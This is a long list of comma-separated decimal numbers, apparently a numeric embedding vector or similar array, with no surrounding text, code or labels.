-0.014504597522318363, 0.00779240345582366, 0.006701020058244467, -0.028130128979682922, 0.01197169441729784, 0.004823691211640835, 0.040526457130908966, -0.03099082037806511, -0.04213559627532959, 0.011383166536688805, 0.047201402485370636, -0.024271177127957344, -0.004287311807274818, -0.013156198896467686, 0.01192699559032917, 0.004071270115673542, 0.002115719486027956, 0.03480507433414459, -0.009118452668190002, 0.003467842936515808, 0.008567173965275288, 0.024539366364479065, 0.03301714360713959, -0.028174826875329018, -0.03403030335903168, 0.03453688696026802, 0.005970947910100222, -0.024837354198098183, 0.029038995504379272, 0.00697293458506465, 0.004730570130050182, -0.031020618975162506, 0.02687857672572136, -0.014288555830717087, -0.04460890218615532, 0.035520248115062714, -0.02677428163588047, 0.0029296008870005608, -0.04082444682717323, -0.0210231002420187, 0.009520737454295158, 0.011174574494361877, 0.016746962442994118, 0.006980384234338999, -0.015957292169332504, 0.025105545297265053, 0.04064565151929855, -0.00465979753062129, 0.018490197136998177, -0.005989572033286095, -0.021276390179991722, 0.012187736108899117, -0.012396328151226044, -0.01589769497513771, -0.0044065071269869804, 0.0001794916024664417, -0.027727844193577766, -0.05092626065015793, -0.0037397576961666346, 0.0009787065209820867, 0.02604420855641365, -0.009401542134582996, -0.023809293285012245, -0.011763102374970913, -0.02833872102200985, -0.021455183625221252, -0.025537628680467606, -0.01165880635380745, 0.003367271739989519, -0.03507326543331146, 0.012403777800500393, -0.02778744325041771, 0.029664771631360054, -0.008209587074816227, -0.007963746786117554, 0.04946611821651459, -0.07115969061851501, -0.024807555601000786, 0.0003808667534030974, 0.0006946860812604427, -0.007673208136111498, 0.0013148749712854624, -0.0196523517370224, -0.02048671990633011, 0.03629501909017563, -0.048572152853012085, 0.006660046521574259, -0.045830655843019485, 0.01178545132279396, 0.05044947937130928, 0.017760124057531357, -0.014564195647835732, 0.017387637868523598, -0.052773792296648026, 0.02659548819065094, -0.014474798925220966, -0.0164340753108263, -0.01412466261535883, -0.04142042249441147, -0.04705240949988365, -0.03143780305981636, -0.015465611591935158, 0.020963501185178757, -0.012269683182239532, 0.012180286459624767, -0.028919799253344536, 0.01710454933345318, -0.01618078351020813, -0.0012888009659945965, 0.0027489452622830868, 0.004395332653075457, 0.01589769497513771, -0.003225727239623666, 0.018683888018131256, -0.0026558239478617907, 0.00106344697996974, 0.0557238794863224, 0.0054606422781944275, 0.04577105864882469, 0.015018627978861332, -0.019860943779349327, -0.011748203076422215, -0.02066551335155964, 0.008671469986438751, -0.015316616743803024, 0.00882046390324831, -0.005944873671978712, 0.014817485585808754, 0.007028807420283556, 0.027370259165763855, 0.015495410189032555, 0.01689595729112625, 0.007591261062771082, -0.008306433446705341, -0.00790414959192276, -0.04586045444011688, 0.061922043561935425, 0.001700397813692689, -0.0013474674196913838, -0.030931223183870316, -0.018490197136998177, 0.022438546642661095, 0.015614605508744717, -0.031199412420392036, 0.005997021682560444, -0.024077484384179115, 0.030752429738640785, 0.04192700237035751, -0.030394842848181725, 0.015182522125542164, 0.01324559561908245, -0.004056370817124844, 0.031676195561885834, -0.010667993687093258, -0.011867398396134377, -0.033762115985155106, 0.05536629259586334, -0.013357341289520264, -0.04615844413638115, -0.006149740889668465, 0.053697556257247925, 0.032689355313777924, 0.004320835694670677, 0.04687361419200897, -0.04526447877287865, -0.012239884585142136, -0.002892352407798171, 0.012061091139912605, -0.006537126377224922, 0.011629007756710052, 0.04150981828570366, 0.011398065835237503, -0.014690840616822243, 0.02239384688436985, 0.01128632016479969, 0.02586541511118412, -0.006969209760427475, -0.0007854794966988266, 0.01972685009241104, 0.03206358104944229, 0.005144029390066862, -0.012306931428611279, -0.014646142721176147, -0.04261237755417824, 0.016568168997764587, -0.018624290823936462, -0.01133101899176836, 0.021917065605521202, 0.02576112002134323, 0.0033151237294077873, 0.016031790524721146, -0.0009279553196392953, 0.018073011189699173, 0.026655085384845734, -0.010571147315204144, -0.001968587515875697, 0.03593743219971657, -0.000021054178432677872, 0.02029302716255188, -0.024822454899549484, -0.027951335534453392, -0.01635957695543766, -0.04216539487242699, -0.028547313064336777, 0.004183015786111355, 0.00002617585960251745, 0.02567172236740589, -0.0484231561422348, -0.032570160925388336, -0.006656321696937084, -0.03462628275156021, -0.027102068066596985, -0.001837286283262074, 0.020173832774162292, -0.02220015414059162, -0.03867892920970917, 0.02002483792603016, -0.007747705094516277, -0.009476039558649063, 0.021782970055937767, -0.03426869586110115, -0.04183760657906532, -0.015003728680312634, 0.041003238409757614, 0.00785945076495409, -0.003937175031751394, 0.016761861741542816, -0.02604420855641365, -0.009617583826184273, 0.02018873207271099, 0.051134854555130005, 0.05217781290411949, -0.036235421895980835, 0.005576112773269415, -0.028562212362885475, -0.0060826935805380344, 0.01197914406657219, 0.014832385815680027, -0.024107282981276512, -0.016940655186772346, 0.039155710488557816, -0.01110007707029581, -0.014549296349287033, 0.009766578674316406, -0.04192700237035751, 0.0008846538257785141, -0.01910107210278511, -0.026267699897289276, 0.0023261739406734705, 0.021514780819416046, 0.009096103720366955, 0.0017190220532938838, 0.004961511120200157, -0.0196374524384737, 0.033672720193862915, 0.023451708257198334, 0.025805817916989326, -0.012567671947181225, -0.05706482753157616, -0.006723369006067514, 0.007568912114948034, -0.02321331575512886, 0.0003743482520803809, 0.05366775766015053, 0.006350883282721043, 0.00854482501745224, -0.024286076426506042, 0.03328533470630646, -0.01183015014976263, 0.01701515167951584, -0.03236156702041626, -0.023645399138331413, 0.03772536292672157, -0.012999755330383778, -0.022721635177731514, 0.02897939644753933, -0.02506084553897381, -0.0012478275457397103, -0.026535889133810997, -0.017238643020391464, -0.024181779474020004, 0.018877580761909485, -0.0196523517370224, 0.012143038213253021, 0.019890742376446724, -0.0017125036101788282, -0.025478029623627663, -0.004298486281186342, 0.04413212090730667, 0.029024096205830574, 0.0012292031897231936, 0.028025833889842033, -0.010816988535225391, 0.033046942204236984, -0.02301962301135063, 0.013334992341697216, 0.007509313989430666, -0.014161910861730576, 0.027385158464312553, -0.01545071229338646, 0.01765582710504532, -0.020158933475613594, 0.008328783325850964, -0.0017367152031511068, 0.004860939923673868, 0.00950583815574646, 0.04457910358905792, -0.052863188087940216, 0.02121679298579693, -0.019577855244278908, 0.029590273275971413, -0.014959030784666538, 0.03966229036450386, 0.006254036910831928, -0.0006662840023636818, -0.008120191283524036, -0.003294637193903327, -0.003158679697662592, 0.016061589121818542, -0.011316119693219662, 0.026848778128623962, -0.004004222806543112, -0.017342939972877502, 0.02659548819065094, 0.018713688477873802, 0.00591879989951849, -0.011271420866250992, 0.02029302716255188, -0.0010662407148629427, -0.0006821146816946566, -0.016299979761242867, 0.003225727239623666, 0.040705252438783646, -0.019503356888890266, -0.025641923770308495, -0.000521014560945332, 0.008306433446705341, 0.02677428163588047, 0.002462131204083562, -0.0319741815328598, 0.015957292169332504, -0.026252800598740578, 0.005464367102831602, -0.004004222806543112, -0.013022104278206825, 0.004976410418748856, -0.02686367742717266, -0.003622424555942416, 0.02285573072731495, 0.02695307321846485, -0.008611871860921383, -0.005453192628920078, 0.004440031014382839, 0.00983362551778555, -0.026386896148324013, -0.006410480942577124, 0.017432335764169693, -0.00507325679063797, -0.005456917453557253, 0.03799355402588844, -0.014012916944921017, 0.001398684224113822, -0.00433945981785655, -0.0052594998851418495, -0.006391856819391251, -0.021157193928956985, 0.04168861359357834, 0.0196374524384737, -0.03855973109602928, -0.02850261516869068, 0.015704002231359482, 0.013849022798240185, -0.002717284020036459, -0.022900428622961044, 0.03274895250797272, 0.03510306403040886, 0.03739757835865021, 0.05006209388375282, -0.0013409489765763283, 0.017566431313753128, 0.004320835694670677, -0.020978402346372604, 0.02632729709148407, -0.038440536707639694, -0.0009097966249100864, 0.01783462055027485, -0.03233176842331886, 0.0006350883049890399, -0.004462379962205887, 0.02905389480292797, 0.031139815226197243, 0.004220264498144388, -0.004693321418017149, -0.016702264547348022, 0.004611374344676733, -0.027012672275304794, 0.033046942204236984, 0.0050993310287594795, -0.02036752551794052, -0.00949838850647211, 0.030096855014562607, 0.030871624127030373, 0.00821703765541315, -0.019264966249465942, 0.012813512235879898, -0.01865408942103386, 0.016985353082418442, -0.03721878305077553, 0.006570649798959494, -0.03462628275156021, 0.007587536238133907, 0.02275143377482891, 0.009408991783857346, 0.013536134734749794, 0.022513043135404587, -0.03665260598063469, -0.007881799712777138, 0.010042217560112476, 0.01411721296608448, 0.026193203404545784, -0.02570152096450329, 0.018981877714395523, 0.04621804133057594, -0.013923520222306252, -0.018236905336380005, -0.026476291939616203, -0.03799355402588844, -0.04732060059905052, -0.008753417059779167, 0.014795136637985706, -0.0022181530948728323, -0.028130128979682922, -0.019309664145112038, 0.0073342458344995975, 0.016866158694028854, -0.013349891640245914, -0.005482991226017475, -0.006309909746050835, 0.01444500032812357, -0.021529680117964745, -0.03736777603626251, 0.014795136637985706, 0.03802335262298584, -0.026118705049157143, 0.011234172619879246, 0.011725854128599167, 0.006872363388538361, -0.01129376981407404, 0.002087783068418503, -0.026103805750608444, -0.004700771067291498, -0.014646142721176147, 0.0013353616232052445, -0.021619077771902084, -0.017342939972877502, 0.04651603102684021, -0.02348150685429573, 0.01077973935753107, 0.0016473185969516635, 0.011077728122472763, -0.013781975023448467, 0.015361315570771694, -0.020874105393886566, -0.012917808257043362, -0.013729827478528023, -0.02111249603331089, 0.00850757583975792, 0.014981379732489586, 0.016851259395480156, 0.0034715677611529827, 0.028562212362885475, -0.006790416315197945, 0.0009172463323920965, 0.010280609130859375, 0.007267198525369167, -0.025388633832335472, 0.0027340459637343884, -0.037069790065288544, 0.01984604448080063, 0.019577855244278908, -0.02349640615284443, 0.00996027048677206, 0.012232434004545212, 0.00040065505891107023, 0.00016692020290065557, -0.03400050476193428, -0.020993301644921303, -0.019443759694695473, -0.041539620608091354, -0.00017308950191363692, 0.007643409073352814, 0.003084182506427169, 0.00887261237949133, 0.015197421424090862, 0.02439037151634693, -0.0035386153031140566, -0.02815992757678032, -0.004950336646288633, 0.01901167631149292, -0.025358835235238075, -0.017253544181585312, 0.024449968710541725, -0.00689843762665987, 0.015599706210196018, 0.008447978645563126, 0.003609387669712305, -0.004011672455817461, 0.024747958406805992, -0.01673206314444542, -0.008068042807281017, 0.007531663402915001, -0.0018698788480833173, 0.013402040116488934, -0.03608642518520355, 0.032123178243637085, 0.003166129579767585, 0.015525208786129951, 0.011316119693219662, -0.02532903663814068, -0.006715919356793165, 0.00046071840915828943, 0.00900670699775219, -0.005449467804282904, 0.02915818989276886, -0.02741495706140995, -0.015927493572235107, 0.025269437581300735, -0.011271420866250992, 0.012902908958494663, 0.011696054600179195, -0.014296005479991436, 0.014221508987247944, -0.01443755067884922, 0.020427122712135315, -0.0032778752502053976, 0.012321830727159977, 0.0076173353008925915, -0.033970706164836884, 0.0009759128442965448, 0.030663032084703445, -0.03549044951796532, 0.00949838850647211, 0.026640186086297035, 0.016583068296313286, 0.0337919145822525, -0.03969208896160126, 0.003402658039703965, -0.025433331727981567, 0.04028806835412979, -0.0018074874533340335, -0.0024192954879254103, 0.0024192954879254103, -0.032033782452344894, 0.00804569385945797, 0.006961760111153126, -0.0015309167793020606, -0.008343682624399662, 0.038172345608472824, -0.011353367939591408, 0.01689595729112625, -0.028130128979682922, 0.01160665787756443, 0.01183015014976263, -0.01901167631149292, -0.01790911890566349, 0.012679417617619038, 0.002337348647415638, -0.02395828813314438, -0.025850515812635422, -0.009878324344754219, -0.01956295594573021, -0.028189726173877716, 0.02750435285270214, -0.012500624172389507, 0.03948349878191948, -0.006291285622864962, -0.012180286459624767, 0.02020363137125969, 0.02512044459581375, 0.0058592017740011215, -0.010586046613752842, 0.020620815455913544, 0.0006234481697902083, 0.009975170716643333, 0.008939660154283047, -0.0028197176288813353, -0.00598584720864892, -0.000714707188308239, -0.04952571541070938, 0.006660046521574259, -0.019264966249465942, 0.03325553238391876, 0.010496650822460651, 0.0032964996062219143, 0.024241376668214798, 0.0006634903838858008, -0.013334992341697216, -0.0062205130234360695, -0.0012729703448712826, -0.016508571803569794, 0.01146511361002922, -0.00042952271178364754, 0.004697046242654324, -0.019622553139925003, 0.045741260051727295, -0.00605289451777935, -0.020680412650108337, -0.02312391996383667, -0.0025925012305378914, -0.02048671990633011, -0.05187982693314552, -0.02248324453830719, -0.00791159924119711, 0.010444502346217632, 0.0037770061753690243, 0.02750435285270214, 0.03316613659262657, -0.02293022722005844, 0.018594492226839066, -0.003445493755862117, 0.008082942105829716, 0.003682022448629141, -0.015659304335713387, 0.020889004692435265, -0.013275395147502422, 0.03051403909921646, 0.011271420866250992, -0.022736534476280212, 0.007222500164061785, 0.026833878830075264, 0.010727591812610626, -0.012202635407447815, -0.035520248115062714, 0.023436807096004486, -0.00032313144765794277, -0.013007204979658127, 0.007460890803486109, 0.018058111891150475, 0.0027303211390972137, -0.020233429968357086, -0.03370251879096031, -0.006313634570688009, -0.007799853105098009, 0.01856469362974167, 0.032123178243637085, -0.007829652167856693, 0.016687365248799324, -0.03337473049759865, 0.010504100471735, 0.021321088075637817, -0.04815496876835823, -0.009379193186759949, -0.01890738122165203, -0.02459896355867386, 0.0018782597035169601, 0.00213620625436306, 0.019816245883703232, -0.02494165115058422, -0.03763596713542938, 0.02412218227982521, 0.0356692411005497, -0.006447729654610157, -0.024360572919249535, -0.02768314629793167, 0.0002369941066717729, -0.017208844423294067, -0.004540602210909128, 0.0020393598824739456, 0.016046689823269844, -0.010556248016655445, -0.004298486281186342, 0.04645643010735512, 0.013104051351547241, 0.014802586287260056, 0.0031028068624436855, -0.003674572566524148, -0.009096103720366955, 0.008939660154283047, -0.028726106509566307, -0.018981877714395523, 0.013312643393874168, -0.038172345608472824, 0.01197169441729784, -0.005032283253967762, 0.017596229910850525, 0.007498139515519142, 0.008053143508732319, -0.020129133015871048, 0.01545071229338646, 0.008626772090792656, -0.02695307321846485, -0.029366781935095787, 0.004812516737729311, 0.00917805079370737, -0.00678669149056077, 0.002046809531748295, -0.004488454200327396, -0.0021175818983465433, 0.0051775528118014336, -0.0041867406107485294, -0.013208347372710705, -0.04195680469274521, -0.001935063861310482, -0.03343432769179344, -0.04013907164335251, -0.017938917502760887, -0.001720884465612471, 0.022632239386439323, -0.004905638284981251, -0.014050165191292763, 0.017432335764169693, 0.018803084269165993, -0.020874105393886566, 0.010377454571425915, -0.023198416456580162, -0.022885529324412346, -0.002698659896850586, 0.011301219463348389, -0.00022442270710598677, -0.009885773994028568, 0.02905389480292797, -0.031050417572259903, -0.008470327593386173, -0.022513043135404587, 0.021544579416513443, 0.02275143377482891, 0.02541843242943287, -0.018698789179325104, -0.017402537167072296, 0.006693570408970118, 0.021455183625221252, -0.0337919145822525, 0.0082244873046875, -0.015286818146705627, -0.004495903849601746, 0.01019121240824461, 0.028279123827815056, 0.01863919012248516, 0.03683139756321907, -0.027265962213277817, 0.027280861511826515, -0.010608396492898464, -0.01545071229338646, -0.008708718232810497, -0.002229327568784356, -0.011271420866250992, 0.004235163796693087, 0.029485978186130524, 0.004015397280454636, -0.00949838850647211, -0.0031083940993994474, 0.01707475073635578, 0.044549304991960526, -0.010891485027968884, -0.012530422769486904, -0.005658059846609831, -0.006958035286515951, 0.03456668555736542, -0.03218277543783188, 0.0012701766099780798, 0.009587785229086876, 0.008068042807281017, -0.00123292813077569, -0.02431587502360344, -0.018609391525387764, -0.04225479066371918, 0.007941397838294506, 0.023556003347039223, 0.01051155012100935, -0.030543837696313858, 0.0008795321336947381, -0.01954805664718151, 0.020769810304045677, -0.005725107155740261, -0.018326302990317345, -0.026893476024270058, 0.025478029623627663, 0.009446240030229092, -0.03847033530473709, 0.00790414959192276, -0.0196523517370224, -0.0016296254470944405, 0.0038850270211696625, 0.01792401820421219, 0.04553266614675522, -0.01972685009241104, -0.001669667661190033, -0.03125901147723198, -0.001231065602041781, 0.004458655137568712, 0.025463130325078964, -0.007185251452028751, -0.0047380197793245316, 0.015242120251059532, 0.00029891988378949463, 0.0005540726706385612, 0.0003494382544886321, 0.005553763825446367, -0.014534397050738335, -0.007844551466405392, -0.021604178473353386, 0.03251056373119354, -0.022900428622961044, -0.02476285770535469, 0.014348153956234455, 0.033970706164836884, -0.0004898188635706902, -0.026371996849775314, 0.009431340731680393, -0.00449962867423892, 0.03781476244330406, 0.009930471889674664, -0.015763599425554276, 0.010593497194349766, -0.013744726777076721, 0.027742743492126465, -0.0000973119240370579, 0.05274399369955063, -0.02595481276512146, 0.0016156572382897139, -0.014728089794516563, -0.014214059337973595, -0.014549296349287033, -0.0027210088446736336, -0.00729327229782939, -0.008284084498882294, -0.008209587074816227, -0.005430843215435743, -0.03855973109602928, -0.03677180036902428, -0.004328285343945026, 0.004767818376421928, -0.011375716887414455, -0.0035050916485488415, -0.00507325679063797, 0.0032927747815847397, 0.018430598080158234, -0.01863919012248516, -0.014661042019724846, 0.02815992757678032, -0.030931223183870316, 0.022870630025863647, -0.0036075252573937178, -0.013461637310683727, -0.023913590237498283, -0.026208102703094482, -0.00017658155411481857, -0.01493668183684349, 0.002283337991684675, -0.03534145653247833, 0.029083693400025368, 0.00614601606503129, -0.006008196156471968, -0.00882791355252266, -0.018952079117298126, -0.012202635407447815, -0.01407251413911581, 0.003225727239623666, -0.010705242864787579, 0.0056617846712470055, -0.013923520222306252, 0.024196678772568703, 0.08832383900880814, -0.025299236178398132, 0.0029891987796872854, -0.020412223413586617, 0.0002809939906001091, 0.0001563276455271989, 0.006745718419551849, -0.0010085053509101272, -0.0026278875302523375, 0.025716420263051987, 0.0127986129373312, -0.018445497378706932, 0.0005447604926303029, 0.030275648459792137, 0.003922275733202696, -0.0016556994523853064, 0.003914826083928347, -0.010913834907114506, 0.026535889133810997, -0.022542841732501984, 0.010235910303890705, 0.013536134734749794, -0.002590638818219304, -0.009438790380954742, 0.031408004462718964, -0.025433331727981567, -0.0187434870749712, -0.02358580194413662, -0.0392749048769474, -0.02246834523975849, -0.013215797021985054, -0.013148749247193336, -0.020129133015871048, -0.014057614840567112, 0.0027601199690252542, -0.010109265334904194, 0.014325805008411407, -0.007457165978848934, -0.026267699897289276, -0.005725107155740261, -0.004719395190477371, -0.006291285622864962, -0.014370502904057503, 0.0029836115427315235, -0.00760616036131978, -0.016583068296313286, 0.007308172062039375, 0.004108518827706575, -0.010563697665929794, -0.006630247458815575, 0.01015396323055029, -0.010802089236676693, 0.031229211017489433, 0.01707475073635578, 0.0082244873046875, 0.014303455129265785, 0.007025082595646381, -0.01573380082845688, -0.026804080232977867, -0.01540601346641779, 0.0020542594138532877, 0.014206609688699245, -0.043267954140901566, 0.014810035936534405, -0.008209587074816227, 0.01033275667577982, -0.02412218227982521, 0.017685627564787865, -0.025269437581300735, 0.02138068713247776, -0.005713932681828737, 0.022438546642661095, 0.004022846929728985, -0.013081702403724194, 0.0003098616434726864, 0.014132112264633179, 0.016225483268499374, 0.02550782822072506, -0.025463130325078964, 0.006473803427070379, 0.03781476244330406, 0.012888009659945965, -0.012627269141376019, 0.016583068296313286, -0.007784953806549311, 0.035132862627506256, -0.029277386143803596, -0.00886516273021698, -0.008127640932798386, -0.008671469986438751, 0.0035330280661582947, 0.02340700849890709, 0.017223743721842766, 0.000616464065387845, 0.024256275966763496, 0.02276633307337761, 0.010072017088532448, -0.002603675937280059, -0.02057611756026745, -0.01297740638256073, -0.006514776963740587, -0.014839835464954376, 0.021589279174804688, -0.017044952139258385, -0.008135090582072735, -0.002918426413089037, -0.002510554390028119, 0.007047431543469429, 0.0030003732535988092, -0.01013906393200159, -0.02568662166595459, -0.0004833003622479737, 0.02677428163588047, -0.00498013524338603, -0.013409489765763283, 0.015204871073365211, 0.00046816811664029956, -0.008388380520045757, -0.005963497795164585, -0.027012672275304794, -0.03590763360261917, -0.027847040444612503, 0.05187982693314552, -0.005594736896455288, 0.005956048145890236, 0.0015607156092301011, -0.0054382928647100925, -0.03072263114154339, 0.016016891226172447, 0.021976662799715996, 0.03900671377778053, -0.007162902504205704, 0.010370004922151566, -0.010615846142172813, 0.016672465950250626, -0.021782970055937767, 0.037069790065288544, -0.009423891082406044, -0.020695311948657036, -0.0038775773718953133, -0.004894463811069727, 0.007449716329574585, 0.03665260598063469, -0.003966974094510078, -0.008589522913098335, -0.013454187661409378, 0.0038589530158787966, 0.0037676941137760878, 0.019250066950917244, 0.004827416036278009, -0.006343433633446693, -0.04288056865334511, 0.015033528208732605, 0.029918061569333076, -0.008880062028765678, 0.00821703765541315, 0.01618078351020813, -0.010496650822460651, 0.00465979753062129, 0.0034566684626042843, -0.00045140626025386155, -0.016851259395480156, 0.009066305123269558, 0.004488454200327396, -0.005654334556311369, 0.025358835235238075, 0.00630618492141366, -0.048303961753845215, -0.012068540789186954, -0.008947109803557396, 0.018207106739282608, -0.007688107434660196, -0.023347411304712296, 0.0031307432800531387, 0.01179290097206831, 0.004574126098304987, -0.013461637310683727, 0.026386896148324013, 0.02777254208922386, -0.038082949817180634, 0.01324559561908245, 0.015227220021188259, 0.01755153201520443, -0.01078718900680542, 0.01707475073635578, -0.039900682866573334, -0.018415698781609535, 0.008790665306150913, -0.03361311927437782, 0.012858210131525993, 0.015525208786129951, 0.04457910358905792, -0.013148749247193336, -0.00882791355252266, 0.001623107003979385, -0.02442017011344433, 0.006909612100571394, 0.00785945076495409, -0.010563697665929794, 0.015748700127005577, -0.00016540697833988816, -0.01801341399550438, -0.0027135591953992844, 0.019801346585154533, -0.0003762106935027987, -0.033404529094696045, -0.0023950838949531317, 0.005658059846609831, 0.005032283253967762, 0.019086172804236412, -0.003715546103194356, 0.001244102604687214, -0.006995283532887697, 0.012597470544278622, -0.004935437347739935, 0.020054636523127556, 0.005997021682560444, -0.026282599195837975, 0.00831388309597969, -0.004991310182958841, -0.013871371746063232, 0.017059851437807083, 0.006619072984904051, 0.008239386603236198, -0.007829652167856693, 0.0139309698715806, 0.022349148988723755, -0.038082949817180634, 0.00456667598336935, 0.02155947871506214, -0.021037999540567398, -0.006384407170116901, -0.013215797021985054, 0.01790911890566349, -0.008425629697740078, -0.014728089794516563, 0.0022200155071914196, 0.02321331575512886, 0.011077728122472763, -0.0047380197793245316, 0.005017383955419064, -0.006868638563901186, -0.017596229910850525, -0.0032033780589699745, 0.006890987511724234, -0.0001998619263758883, 0.004212814848870039, -0.008641671389341354, -0.029485978186130524, 0.03763596713542938, -0.01215793751180172, -0.011107527650892735, -0.0012897321721538901, -0.017596229910850525, -0.006820215377956629, 0.020456921309232712, 0.00278619397431612, 0.009155701845884323, -0.003032034495845437, 0.0034846048802137375, -0.008909860625863075, -0.009885773994028568, 0.006257761735469103, 0.0060603441670536995, -0.024911852553486824, 0.032123178243637085, -0.00836603157222271, -0.008529925718903542, 0.01562950573861599, -0.01790911890566349, 0.014042715542018414, -0.0035851760767400265, 0.004589025396853685, -0.022080959752202034, -0.005747456103563309, 0.0035162661224603653, 0.007207600865513086, -0.012381428852677345, 0.0028551039285957813, -0.0037341704592108727, -0.00968463160097599, 0.031139815226197243, 0.023645399138331413, -0.02130618877708912, -0.002383909188210964, -0.03766576573252678, -0.0173727385699749, -0.01618078351020813, -0.018311403691768646, -0.007621060125529766, -0.005423393566161394, 0.012090889737010002, 0.009550536051392555, -0.022274652495980263, 0.030543837696313858, 0.0024118456058204174, -0.002771294442936778, 0.014877083711326122, -0.016687365248799324, -0.016419174149632454, -0.0030376219656318426, 0.04806556925177574, 0.02258753962814808, 0.0027303211390972137, -0.01790911890566349, 0.009632483124732971, -0.02339210920035839, -0.012925257906317711, 0.012902908958494663, -0.015748700127005577, 0.015674203634262085, 0.004250063095241785, -0.023511305451393127, -0.018847782164812088, 0.013901171274483204, -0.010221011005342007, 0.00425378791987896, 0.005848027300089598, -0.01609138771891594, 0.0093717435374856, 0.004317110870033503, -0.014132112264633179, -0.03608642518520355, -0.020069535821676254, -0.01490688230842352, 0.005717657506465912, -0.005725107155740261, 0.008939660154283047, -0.011249071918427944, -0.004391607828438282, 0.02588031440973282, 0.020859206095337868, 0.032212574034929276, 0.0004362740146461874, 0.0002246555086458102, 0.00996027048677206, 0.013334992341697216, 0.026893476024270058, -0.006741993594914675, -0.013521235436201096, -0.02593991346657276, 0.021410485729575157, -0.006712194532155991, 0.01294015720486641, 0.01810281164944172, 0.001989074284210801, 0.01471318956464529, 0.008440528996288776, -0.00009678811329649761, -0.019771547988057137, -0.01662776619195938, -0.003855228191241622, -0.013789425604045391, 0.005002484656870365, 0.004745469428598881, 0.005814503878355026, -0.004648623056709766, 0.022170355543494225, 0.02084430679678917, -0.011755652725696564, -0.017521733418107033, 0.003780731000006199, -0.016314879059791565, 0.008850263431668282, -0.008582073263823986, -0.03254036232829094, 0.012917808257043362, 0.004119693301618099, 0.006660046521574259, -0.02018873207271099, -0.01114477589726448, 0.005512790288776159, 0.002843929221853614, 0.023556003347039223, 0.014340704306960106, 0.005933699198067188, 0.021589279174804688, -0.018683888018131256, -0.010980881750583649, 0.04422151669859886, 0.011539611034095287, -0.009490938857197762, -0.002644649241119623, 0.008932209573686123, 0.00614601606503129, 0.0011994043597951531, -0.010124164633452892, 0.0196374524384737, -0.015465611591935158, -0.003993047866970301, 0.0007640615222044289, 0.015659304335713387, 0.016925755888223648, 0.02082940749824047, 0.0021399310790002346, 0.0008883787086233497, -0.000528929871506989, -0.00854482501745224, -0.021917065605521202, 0.00779240345582366, 0.009751678444445133, 0.00498013524338603, 0.025373734533786774, 0.015026077628135681, 0.01444500032812357, 0.013320093043148518, 0.007933948189020157, -0.0008883787086233497, 0.0383809395134449, -0.013849022798240185, 0.0023205867037177086, -0.0032760128378868103, 0.0033579596783965826, -0.03035014495253563, -0.02340700849890709, 0.0011798487976193428, 0.002035635057836771, 0.02112739533185959, -0.018952079117298126, 0.007874350063502789, 0.0051589286886155605, -0.022513043135404587, -0.030663032084703445, -0.03069283254444599, 0.0030208600219339132, -0.02203626185655594, 0.012083440087735653, -0.013342441990971565, 0.010928734205663204, -0.019711948931217194, 0.0036056628450751305, -0.003382171271368861, 0.01707475073635578, -0.02293022722005844, 0.021544579416513443, 0.0005014590569771826, -0.028204627335071564, -0.027847040444612503, -0.017298242077231407, 0.00649242801591754, 0.009215299040079117, -0.00899925734847784, -0.005963497795164585, 0.003240626771003008, -0.012768814340233803, -0.020814508199691772, -0.017313141375780106, -0.022900428622961044, -0.017611129209399223, 0.00932704471051693, 0.027116967365145683, 0.0031549548730254173, 0.004842315800487995, 0.027102068066596985, 0.003970698919147253, 0.0013446738012135029, 0.009908122941851616, -0.004332010168582201, -0.009557986631989479, 0.006689845584332943, 0.009163151495158672, -0.010623295791447163, 0.031944382935762405, -0.0000973119240370579, 0.015197421424090862, 0.0037527945823967457, 0.0098261758685112, 0.0034250072203576565, -0.007296997122466564, -0.001811212277971208, 0.014683390967547894, 0.014459899626672268, 0.011643907055258751, -0.005989572033286095, -0.008738517761230469, -0.017223743721842766, -0.0063993064686656, -0.020442022010684013, -0.006958035286515951, -0.00963993277400732, 0.020158933475613594, -0.0032611133065074682, -0.01589769497513771, 0.008030794560909271, -0.025358835235238075, 0.008522476069629192, -0.007162902504205704, -0.004074994940310717, 0.004693321418017149, 0.02230445109307766, 0.011770552024245262, -0.0016529058339074254, 0.0029147015884518623, 0.011450214311480522, 0.033136337995529175, 0.02850261516869068, 0.004954061470925808, 0.018132610246539116, 0.010355105623602867, -0.004641173407435417, 0.00015306839486584067, -0.006518501788377762, 0.00854482501745224, 0.009736779145896435, -0.003087907563894987, -0.011457663960754871, -0.018579592928290367, -0.0029556748922914267, 0.003287187311798334, -0.017864419147372246, 0.002812267979606986, -0.005225975997745991, 0.0022200155071914196, 0.0013642293633893132, -0.0002014915517065674, -0.00395207479596138, -0.010086916387081146, 0.0019909366965293884, -0.024271177127957344, -0.011949345469474792, 0.002408120781183243, 0.0219468642026186, -0.009535636752843857, -0.029500877484679222, 0.008835364133119583, 0.0029798864852637053, 0.012046191841363907, 0.0033151237294077873, -0.011666256003081799, -0.0012748327571898699, -0.005728831980377436, 0.008962009102106094, -0.007609885185956955, -0.013074252754449844, -0.007207600865513086, -0.002283337991684675, 0.011822699569165707, -0.015182522125542164, 0.0008795321336947381, -0.020978402346372604, 0.007680657785385847, -0.01700025238096714, 0.00016750222130212933, 0.00427241250872612, 0.01653837040066719, 0.008276634849607944, -0.010392354801297188, 0.0023205867037177086, -0.004559226334095001, 0.006760617718100548, 0.0025794643443077803, -0.002095232717692852, 0.004238888621330261, -0.014318355359137058, 0.002516141626983881, 0.00899925734847784, 0.02285573072731495, 0.000331512390403077, 0.01471318956464529, 0.010243359953165054, 0.005076981615275145, -0.007658308371901512, 0.027936436235904694, 0.008403279818594456, 0.009252548217773438, 0.020144034177064896, -0.0027936436235904694, 0.012329280376434326, -0.008745967410504818, -0.0009693943429738283, -0.005631985608488321, -0.006231687963008881, 0.00021871902572456747, 0.009520737454295158, -0.006999008823186159, 0.007352869957685471, 0.011494912207126617, -0.023004723712801933, -0.010951083153486252, -0.002685622777789831, 0.007431092206388712, 0.006864913739264011, -0.039721887558698654, -0.014370502904057503, -0.016240382567048073, -0.017387637868523598, 0.004689596593379974, -0.011710953898727894, -0.02018873207271099, -0.01819220744073391, 0.006488703191280365, 0.01719394512474537, -0.03355352208018303, 0.016061589121818542, -0.009528187103569508, -0.010608396492898464, -0.007688107434660196, -0.0069654849357903, -0.003486467292532325, 0.01817730814218521, -0.010712692514061928, 0.010869136080145836, -0.014273656532168388, -0.008351132273674011, -0.020039737224578857, 0.006138566415756941, 0.028025833889842033, -0.003475292818620801, -0.017119448632001877, -0.008239386603236198, 0.0008748761028982699, 0.000616464065387845, -0.01211323868483305, 0.010310407727956772, 0.014951581135392189, -0.018877580761909485, 0.02267693728208542, 0.002886765170842409, -0.009751678444445133, -0.034119702875614166, 